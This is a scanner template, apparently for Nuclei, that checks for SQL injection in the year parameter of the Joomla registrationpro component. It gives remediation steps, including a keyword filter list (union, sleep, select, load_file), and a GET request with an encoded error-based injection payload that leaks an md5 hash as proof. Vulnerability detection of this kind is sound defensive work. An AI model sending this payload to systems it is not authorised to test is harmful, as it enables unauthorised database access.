id: Joomla-sqli-registrationpro
info:
  name: Joomla com_registrationpro_index.php file year parameter sql injection vulnerability
  author:
  - 折跃
  description: |-
    SQL injection vulnerability in Joomla! registrationpro component
    Joomla! is an open source content management system (CMS).

    There is a SQL injection vulnerability in the year parameter of the Joomla! registrationpro component. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program:
    http://www.joomla.org/

    Temporary fix:
    1. Use precompiled statements. When using PDO, be careful not to splice variables directly into PDO statements. All query statements use the parameterized query interface provided by the database. Parameterized statements use parameters instead of embedding user input variables into the SQL statement. Almost all current database systems provide parameterized SQL statement execution interfaces. Using this interface can very effectively prevent SQL injection attacks.
    2. Escape or code the special characters (’”<>&*;, etc.) that enter the database.
    3. Confirm the type of each data. For example, numeric data must be numbers, and the storage fields in the database must correspond to int types.
    4. The data length should be strictly specified, which can prevent relatively long SQL injection statements from being executed correctly to a certain extent.
    5. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding for all data. Inconsistent encoding of the upper and lower layers may cause some filtering models to be bypassed.
    6. Strictly limit the database operation permissions of website users, and provide this user with permissions that are only sufficient for his or her work, thereby minimizing the harm of injection attacks to the database.
    7. Prevent the website from displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
    8. Filter dangerous characters, for example: use regular expressions to match keywords such as union, sleep, and, select, load_file, etc. If a match is found, the operation will be terminated.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,'ed3b9c4a886067de0e3a094246')
  path:
  - '{{BaseURL}}/index.php?option=com_registrationpro&view=calendar&Itemid=1&listview=1&month=6&year=-1%20AND%20%28SELECT%207804%20FROM%28SELECT%20COUNT%28*%29%2CCONCAT%281%2C%28MID%28%28md5%283.14%29%29%2C1%2C54%29%29%2C1%2CFLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
